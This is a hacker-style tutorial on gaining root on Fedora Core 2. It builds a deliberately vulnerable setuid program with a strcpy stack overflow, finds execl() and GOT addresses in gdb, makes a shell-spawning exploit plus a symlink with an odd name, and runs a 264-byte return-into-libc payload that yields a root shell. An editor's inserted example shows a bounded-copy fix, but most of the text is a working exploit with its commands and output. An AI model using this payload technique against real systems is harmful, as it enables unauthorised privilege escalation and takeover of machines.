Local hacking techniques on Fedora Core 2: getting root


Let's create a simple C program to test the vulnerability:

[dokter@localhost fedora]$ cat vul.c
#include <string.h>

int main(int argc, char *argv[])
{
    char buffer[256];
    strcpy(buffer, argv[1]); /* no length check: an argv[1] longer than 255 bytes overflows buffer */
    return 0;
}
Now let's compile it:
[dokter@localhost fedora]$ gcc -o vul vul.c
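As an added example (not code from the original post), here is the same program with the copy bounded, which is the fix for this class of bug: the argument is measured against the buffer before anything is written, and an over-long argument is rejected instead of running past the end of the stack frame. The names copy_arg, handle_arg and handle_arg_of_len are the editor's own.

```c
/* Added example (not from the original post): vul.c with a bounded copy.
 * The original copies argv[1] into a 256-byte stack buffer with strcpy(),
 * so any argument of 256 bytes or more overwrites what lies above the buffer. */
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 256

/* Copy src into dst (dst_size bytes) only if it fits together with its NUL.
 * Returns 0 on success, -1 if src is too long; dst is left empty on failure. */
int copy_arg(char *dst, size_t dst_size, const char *src)
{
    size_t len = 0;

    if (dst_size == 0)
        return -1;
    /* Measure src, but never look further than the room we actually have. */
    while (len < dst_size && src[len] != '\0')
        len++;
    if (len == dst_size) {          /* no room left for the terminating NUL */
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, len + 1);      /* copies the NUL as well */
    return 0;
}

/* What vul.c's main() should do with its argument.
 * Returns 0 when the argument is accepted, 1 when it is rejected. */
int handle_arg(const char *arg)
{
    char buffer[BUF_SIZE];

    if (copy_arg(buffer, sizeof buffer, arg) != 0) {
        fprintf(stderr, "argument too long (max %d bytes)\n", BUF_SIZE - 1);
        return 1;
    }
    return 0;
}

/* Helper for exercising the limit: feed an argument of n 'A' bytes
 * (the same shape of input the attack below uses). */
int handle_arg_of_len(size_t n)
{
    char tmp[1024];

    if (n >= sizeof tmp)
        return -1;
    memset(tmp, 'A', n);
    tmp[n] = '\0';
    return handle_arg(tmp);
}

int main(int argc, char *argv[])
{
    if (argc < 2) {
        fprintf(stderr, "usage: %s <argument>\n", argv[0]);
        return 2;
    }
    return handle_arg(argv[1]);
}
```

Compiling this with the stack protector enabled (`gcc -fstack-protector-all`) is the belt-and-braces companion to the length check: the check prevents the overflow, the protector turns any overflow that still happens into an abort rather than a controlled return.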
And now let's set things up for a proper test:
[dokter@localhost fedora]$ su
Password:
[root@localhost fedora]# chgrp root vul
[root@localhost fedora]# chown root vul
[root@localhost fedora]# chmod 4755 vul
[root@localhost fedora]# ls -l vul
-rwsr-xr-x 1 root root 4733 11?12 23:11 vul
[root@localhost fedora]# su dokter
[dokter@localhost fedora]$
Now you are ready to attack the vulnerable program....
The first step you have to take is to find the address of execl() using GDB.
"What is gdb?" you must be asking.... The answer... use your imagination,
hehehehehe
[dokter@localhost fedora]$ gdb vul
GNU gdb Red Hat Linux (6.0post-0.20040223.19rh)
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux-gnu"...(no debugging symbols found)...Using host libthread_db library "/lib/tls/libthread_db.so.1".
(gdb) b main
Breakpoint 1 at 0x8048379
(gdb) r
Starting program: /home/dokter/fedora/vul
Error while mapping shared library sections:
Error while reading shared library symbols:
(no debugging symbols found)...(no debugging symbols found)...Error while reading shared library symbols:
Error while reading shared library symbols:
Breakpoint 1, 0x08048379 in main ()
(gdb) disas execl
Dump of assembler code for function execl:
0x005fea00: push %ebp
0x005fea01: mov %esp,%ebp
0x005fea03: lea 0x10(%ebp),%eax
0x005fea06: push %edi
0x005fea07: push %esi
0x005fea08: push %ebx
0x005fea09: sub $0x1030,%esp
0x005fea0f: mov 0xc(%ebp),%ecx
0x005fea12: movl $0x400,0xfffffff0(%ebp)
0x005fea19: lea 0x1b(%esp),%esi
0x005fea1d: and $0xfffffff0,%esi
0x005fea20: call 0x58c90d <__i686.get_pc_thunk.bx>
0x005fea25: add $0x905d7,%ebx
0x005fea2b: mov %ecx,(%esi)
0x005fea2d: test %ecx,%ecx
0x005fea2f: mov %eax,0xffffffe8(%ebp)
0x005fea32: movl $0x1,0xffffffec(%ebp)
0x005fea39: je 0x5fea73
0x005fea3b: movl $0x1a,0xffffffe0(%ebp)
0x005fea42: lea 0x0(%esi),%esi
0x005fea49: lea 0x0(%edi),%edi
0x005fea50: mov 0xfffffff0(%ebp),%edx
0x005fea53: cmp %edx,0xffffffec(%ebp)
0x005fea56: je 0x5fea96
0x005fea58: addl $0x8,0xffffffe0(%ebp)
0x005fea5c: mov 0xffffffe8(%ebp),%edx
0x005fea5f: mov 0xffffffec(%ebp),%edi
0x005fea62: addl $0x4,0xffffffe8(%ebp)
0x005fea66: mov (%edx),%ecx
0x005fea68: mov %ecx,(%esi,%edi,4)
0x005fea6b: inc %edi
0x005fea6c: test %ecx,%ecx
0x005fea6e: mov %edi,0xffffffec(%ebp)
0x005fea71: jne 0x5fea50
0x005fea73: mov 0xfffffee0(%ebx),%edi
0x005fea79: mov (%edi),%ecx
0x005fea7b: mov %esi,0x4(%esp)
0x005fea7f: mov 0x8(%ebp),%esi
0x005fea82: mov %ecx,0x8(%esp)
0x005fea86: mov %esi,(%esp)
0x005fea89: call 0x5fe7a0
0x005fea8e: lea 0xfffffff4(%ebp),%esp
0x005fea91: pop %ebx
0x005fea92: pop %esi
0x005fea93: pop %edi
0x005fea94: pop %ebp
0x005fea95: ret
0x005fea96: mov 0xffffffec(%ebp),%edx
0x005fea99: mov 0xffffffe0(%ebp),%ecx
0x005fea9c: add %edx,%edx
0x005fea9e: mov %edx,0xffffffe4(%ebp)
0x005feaa1: and $0xfffffffc,%ecx
0x005feaa4: sub %ecx,%esp
0x005feaa6: mov %edx,0xfffffff0(%ebp)
0x005feaa9: mov 0xffffffe4(%ebp),%eax
0x005feaac: lea 0x1b(%esp),%edx
0x005feab0: and $0xfffffff0,%edx
0x005feab3: lea (%eax,%edx,1),%edi
0x005feab6: cmp %esi,%edi
0x005feab8: je 0x5feacc
0x005feaba: cld
0x005feabb: mov 0xffffffec(%ebp),%ecx
0x005feabe: mov %edx,%edi
0x005feac0: shl $0x2,%ecx
0x005feac3: shr $0x2,%ecx
0x005feac6: repz movsl %ds:(%esi),%es:(%edi)
0x005feac8: mov %edx,%esi
0x005feaca: jmp 0x5fea58
0x005feacc: cld
0x005feacd: mov 0xffffffec(%ebp),%ecx
0x005fead0: mov %edx,%edi
0x005fead2: shl $0x2,%ecx
0x005fead5: shr $0x2,%ecx
0x005fead8: repz movsl %ds:(%esi),%es:(%edi)
0x005feada: mov %edx,%esi
0x005feadc: mov 0xffffffe4(%ebp),%edi
0x005feadf: mov 0xffffffec(%ebp),%eax
0x005feae2: add %eax,%edi
0x005feae4: mov %edi,0xfffffff0(%ebp)
0x005feae7: jmp 0x5fea58
0x005feaec: nop
0x005feaed: nop
0x005feaee: nop
0x005feaef: nop
End of assembler dump.
(gdb) q
The program is running. Exit anyway? (y or n) y

keep moving lolz
We do not use the address of execl() itself, because the value of %ebp would be
changed when "push %ebp" and "mov %esp,%ebp" execute. The address we need instead
is easy to find with gdb: 0x005fea03, the instruction right after those two.

[dokter@localhost fedora]$ gdb -q vul
(no debugging symbols found)...Using host libthread_db library
"/lib/tls/libthread_db.so.1".
(gdb) b main
Breakpoint 1 at 0x8048379
(gdb) r
Starting program: /home/dokter/fedora/vul
Error while mapping shared library sections:
Error while reading shared library symbols:
(no debugging symbols found)...(no debugging symbols found)...Error while reading shared library symbols:
Error while reading shared library symbols:
Breakpoint 1, 0x08048379 in main ()
(gdb) x/50x 0x8049000
0x8049000: 0x464c457f 0x00010101 0x00000000 0x00000000
0x8049010: 0x00030002 0x00000001 0x080482c0 0x00000034
0x8049020: 0x00000788 0x00000000 0x00200034 0x00280007
0x8049030: 0x0019001c 0x00000006 0x00000034 0x08048034
0x8049040: 0x08048034 0x000000e0 0x000000e0 0x00000005
0x8049050: 0x00000004 0x00000003 0x00000114 0x08048114
0x8049060: 0x08048114 0x00000013 0x00000013 0x00000004
0x8049070: 0x00000001 0x00000001 0x00000000 0x08048000
0x8049080: 0x08048000 0x0000047c 0x0000047c 0x00000005
0x8049090: 0x00001000 0x00000001 0x0000047c 0x0804947c
0x80490a0: 0x0804947c 0x00000100 0x00000104 0x00000006
0x80490b0: 0x00001000 0x00000002 0x00000490 0x08049490
0x80490c0: 0x08049490 0x000000c8
(gdb)
0x80490c8: 0x000000c8 0x00000006 0x00000004 0x00000004
0x80490d8: 0x00000128 0x08048128 0x08048128 0x00000020
0x80490e8: 0x00000020 0x00000004 0x00000004 0x6474e551
0x80490f8: 0x00000000 0x00000000 0x00000000 0x00000000
0x8049108: 0x00000000 0x00000006 0x00000004 0x62696c2f
0x8049118: 0x2d646c2f 0x756e696c 0x6f732e78 0x0000322e
0x8049128: 0x00000004 0x00000010 0x00000001 0x00554e47
0x8049138: 0x00000000 0x00000002 0x00000002 0x00000005
0x8049148: 0x00000003 0x00000006 0x00000004 0x00000001
0x8049158: 0x00000005 0x00000000 0x00000000 0x00000000
0x8049168: 0x00000000 0x00000003 0x00000002 0x00000000
0x8049178: 0x00000000 0x00000000 0x00000000 0x00000044
0x8049188: 0x00000000 0x000000ef
(gdb)
0x8049190: 0x00000012 0x00000035 0x08048474 0x00000004
0x80491a0: 0x000e0011 0x00000001 0x00000000 0x00000000
0x80491b0: 0x00000020 0x00000015 0x00000000 0x00000000
0x80491c0: 0x00000020 0x0000002e 0x00000000 0x00000030
0x80491d0: 0x00000012 0x764a5f00 0x6765525f 0x65747369
0x80491e0: 0x616c4372 0x73657373 0x675f5f00 0x5f6e6f6d
0x80491f0: 0x72617473 0x005f5f74 0x6362696c 0x2e6f732e
0x8049200: 0x74730036 0x79706372 0x4f495f00 0x6474735f
0x8049210: 0x755f6e69 0x00646573 0x696c5f5f 0x735f6362
0x8049220: 0x74726174 0x69616d5f 0x4c47006e 0x5f434249
0x8049230: 0x00302e32 0x00020000 0x00000001 0x00020000
0x8049240: 0x00010001 0x00000024 0x00000010 0x00000000
0x8049250: 0x0d696910 0x00020000
(gdb)
0x8049258: 0x00000056 0x00000000 0x08049558 0x00000406
0x8049268: 0x08049568 0x00000107 0x0804956c 0x00000507
0x8049278: 0x83e58955 0x61e808ec 0xe8000000 0x000000bc
0x8049288: 0x0001a3e8 0x00c3c900 0x956035ff 0x25ff0804
0x8049298: 0x08049564 0x00000000 0x956825ff 0x00680804
0x80492a8: 0xe9000000 0xffffffe0 0x956c25ff 0x08680804
0x80492b8: 0xe9000000 0xffffffd0 0x895eed31 0xf0e483e1
0x80492c8: 0x68525450 0x080483ec 0x0483a468 0x68565108
0x80492d8: 0x08048370 0xffffbfe8 0x9090f4ff 0x53e58955
0x80492e8: 0x000000e8 0xc3815b00 0x0000126f 0xfc838b50
0x80492f8: 0x85ffffff 0xff0274c0 0xfc5d8bd0 0x9090c3c9
0x8049308: 0x83e58955 0x3d8008ec 0x0804957c 0xa1297500
0x8049318: 0x08049578 0xd285108b
(gdb)
0x8049320: 0xf6891774 0xa304c083 0x08049578 0x78a1d2ff
0x8049330: 0x8b080495 0x75d28510 0x7c05c6eb 0x01080495
0x8049340: 0xf689c3c9 0x83e58955 0x8ca108ec 0x85080494
0x8049350: 0xb81974c0 0x00000000 0x1074c085 0x680cec83
0x8049360: 0x0804948c 0xc483d0ff 0x00768d10 0x9090c3c9
0x8049370: 0x81e58955 0x000108ec 0xf0e48300 0x000000b8
0x8049380: 0x83c42900 0x458b08ec 0x04c0830c 0x858d30ff
0x8049390: 0xfffffef8 0xff16e850 0xc483ffff 0x0000b810
0x80493a0: 0xc3c90000 0x57e58955 0xec835356 0x0000e80c
0x80493b0: 0x815b0000 0x0011aac3 0xfebae800 0x938dffff
0x80493c0: 0xffffff20 0xff208b8d 0xca29ffff 0xfac1f631
0x80493d0: 0x73d63902 0x90d7890f 0x20b394ff 0x46ffffff
0x80493e0: 0xf472fe39 0x5b0cc483
(gdb)
0x80493e8: 0xc3c95f5e 0x56e58955 0x0000e853 0x815b0000
0x80493f8: 0x001166c3 0x208b8d00 0x8dffffff 0xffff2083
0x8049408: 0xc1c129ff 0xc98502f9 0x75ff718d 0x003ae80b
0x8049418: 0x5e5b0000 0xf689c3c9 0x20b394ff 0x89ffffff
0x8049428: 0xd2854ef2 0xe5ebf275 0x53e58955 0x947ca152
0x8049438: 0xf8830804 0x947cbbff 0x0c740804 0xff04eb83
0x8049448: 0x83038bd0 0xf475fff8 0xc3c95b58 0x53e58955
0x8049458: 0x000000e8 0xc3815b00 0x000010ff 0xfe9ee852
0x8049468: 0x5d8bffff 0x00c3c9fc 0x00000003 0x00020001
0x8049478: 0x00000000 0xffffffff 0x00000000 0xffffffff
0x8049488 <__DTOR_END__>: 0x00000000 0x00000000 0x00000001 0x00000024
0x8049498 <_DYNAMIC+8>: 0x0000000c 0x08048278 0x0000000d 0x08048454
0x80494a8 <_DYNAMIC+24>: 0x00000004 0x08048148
(gdb)
0x80494b0 <_DYNAMIC+32>: 0x00000005 0x080481d4 0x00000006 0x08048174
0x80494c0 <_DYNAMIC+48>: 0x0000000a 0x00000060 0x0000000b 0x00000010
0x80494d0 <_DYNAMIC+64>: 0x00000015 0x005714b8 0x00000003 0x0804955c
0x80494e0 <_DYNAMIC+80>: 0x00000002 0x00000010 0x00000014 0x00000011
0x80494f0 <_DYNAMIC+96>: 0x00000017 0x08048268 0x00000011 0x08048260
0x8049500 <_DYNAMIC+112>: 0x00000012 0x00000008 0x00000013 0x00000008
0x8049510 <_DYNAMIC+128>: 0x6ffffffe 0x08048240 0x6fffffff 0x00000001
0x8049520 <_DYNAMIC+144>: 0x6ffffff0 0x08048234 0x00000000 0x00000000
0x8049530 <_DYNAMIC+160>: 0x00000000 0x00000000 0x00000000 0x00000000
0x8049540 <_DYNAMIC+176>: 0x00000000 0x00000000 0x00000000 0x00000000
0x8049550 <_DYNAMIC+192>: 0x00000000 0x00000000 0x00000000 0x08049490
0x8049560 <_GLOBAL_OFFSET_TABLE_+4>: 0x005714d0 0x00566830 0x0058c9f0 0x080482b6
0x8049570: 0x00000000 0x00000000
(gdb) x/8x 0x8049564
0x8049564 <_GLOBAL_OFFSET_TABLE_+8>: 0x00566830 0x0058c9f0 0x080482b6 0x00000000
0x8049574 <__dso_handle>: 0x00000000 0x08049488 0x00000000 0x00000000
(gdb)

But do not worry, because there are parts of execl() we can use. Its prototype is:
execl(char *path, char *arg0, ..., char *argn, 0);

The last argument of execl() must be NULL (an empty pointer), so we need a place in
memory where pointer values are laid out with a zero word after them, and the GOT
words dumped above give us exactly that:
<_GLOBAL_OFFSET_TABLE_+8> 0x8049564: 0x00566830 0x0058c9f0 0x080482b6 0x00000000
We will use execl() as "execl(0x8049568, 0x804956c, 0x8049570)": those are the
addresses of the argument slots, and we have to work with addresses because the
arguments must be pointers. The slot at 0x8049568 holds 0x0058c9f0 (the path),
the slot at 0x804956c holds 0x080482b6 (arg0), and the slot at 0x8049570 holds
0x00000000 (the terminating NULL).
In more detail, here is what those two pointers refer to:
(gdb) x/8x 0x0058c9f0
0x58c9f0 <__libc_start_main>: 0x57e58955 0xec835356 0x0c458b4c 0xe810558b
0x58ca00 <__libc_start_main+16>: 0xffffff09 0x25f8c381 0x7d8b0010 0x1c758b18
(gdb) x/8x 0x080482b6
0x80482b6 <_init+62>: 0x00000868 0xffd0e900 0xed31ffff 0x83e1895e
0x80482c6 <_start+6>: 0x5450f0e4 0x83ec6852 0xa4680804 0x51080483
(gdb) q
The program is running. Exit anyway? (y or n) y
[dokter@localhost fedora]$

The 25 bytes of data at 0x0058c9f0 (up to the first zero byte, which is the 0x00 in
0x7d8b0010) are the file name execl() will be called with, so we need to create a
symbolic link with exactly that name. Now let us write the exploit program.
This program should make us take on the permissions (setuid(0)) of the vulnerable
program and give us root access when the attack succeeds.

[dokter@localhost fedora]$ cat > exploit.c
#include <unistd.h> /* setreuid, setregid, geteuid, getegid, execl */

int main(void)
{
    /* make the real uid/gid match the effective ones inherited from the setuid binary */
    setreuid(geteuid(), geteuid());
    setregid(getegid(), getegid());
    execl("/bin/sh", "sh", (char *)0); /* argument list must end with a null pointer */
    return 1; /* only reached if execl() fails */
}
[dokter@localhost fedora]$ gcc -o exploit exploit.c
Let's create a symbolic link to the exploit whose name is the value of the first
argument of execl() (the 25 bytes found above).
[dokter@localhost fedora]$ ln -s /home/dokter/fedora/exploit "`perl -e 'print
"\x55\x89\xe5\x57\x56\x53\x83\xec\x4c\x8b\x45\x0c\x8b\x55\x10",
"\xe8\x09\xff\xff\xff\x81\xc3\xf8\x25\x10"'`"
Let's check whether the symbolic link was created successfully.
[dokter@localhost fedora]$ ls -l
total 24
lrwxrwxrwx 1 dokter dokter 29 11?12 11:28 U??WVS??L?E??U?????????%? -> /home/dokter/fedora/exploit
-rwxrwxr-x 1 dokter dokter 5186 11?12 11:27 exploit
-rw-rw-r-- 1 dokter dokter 101 11?12 11:27 exploit.c
-rwsr-xr-x 1 root root 4725 11?12 10:31 vul
-rw-rw-r-- 1 dokter dokter 90 11?12 10:31 vul.c
[dokter@localhost fedora]$
Great... hehehheheheheheh
You can see what happened in the process above.
Moving on.............
Use gdb to find the remaining address values.
[dokter@localhost fedora]$ gdb -q vul
(no debugging symbols found)...Using host libthread_db library
"/lib/tls/libthread_db.so.1".
(gdb) disas main
Dump of assembler code for function main:
0x08048370: push %ebp
0x08048371: mov %esp,%ebp
0x08048373: sub $0x108,%esp // 0x108 = 264 bytes: buffer starts at ebp-0x108, so 264 bytes reach the saved %ebp
0x08048379: and $0xfffffff0,%esp
0x0804837c: mov $0x0,%eax
0x08048381: sub %eax,%esp
0x08048383: sub $0x8,%esp
0x08048386: mov 0xc(%ebp),%eax
0x08048389: add $0x4,%eax
0x0804838c: pushl (%eax)
0x0804838e: lea 0xfffffef8(%ebp),%eax
0x08048394: push %eax
0x08048395: call 0x80482b0 <_init+56>
0x0804839a: add $0x10,%esp
0x0804839d: mov $0x0,%eax
0x080483a2: leave
0x080483a3: ret
End of assembler dump.
(gdb) q
[dokter@localhost fedora]$

Now we have all the data we need for the attack...
Here is what we have collected:

+-------------------------+---------------------------------+-----------+
| Data to overflow buffer | first argument of execl() - 8   | execl()+3 |
+-------------------------+---------------------------------+-----------+
| 264 bytes               | 0x8049568 - 8 = 0x8049560       | 0x5fea03  |
+-------------------------+---------------------------------+-----------+

The 264 bytes fill the buffer up to the saved %ebp; the next word replaces the
saved %ebp and the word after it replaces the return address. The saved %ebp has
to be the first argument's address minus 8 because execl() calls execve()
internally and takes the file-name pointer from %ebp+8: once execl()+3 runs with
%ebp = 0x8049560, 0x8(%ebp) is 0x8049568, the slot holding the path pointer.
Let's carry out the final step of the attack.

[dokter@localhost fedora]$ ./vul `perl -e 'print "A"x264,"\x60\x95\x04\x08\x03\xea\x5f"'`
sh-2.05b# id
uid=0(root) gid=501(dokter) groups=501(dokter)
sh-2.05b# whoami
root
sh-2.05b#

=====================================================================
WARNING!
I am not responsible for misuse of this article; it is only
for science.
So once again ...
PLEASE DON'T TRY THIS ON OTHER PEOPLE'S computers.
TRY THIS AT YOUR OWN RISK.
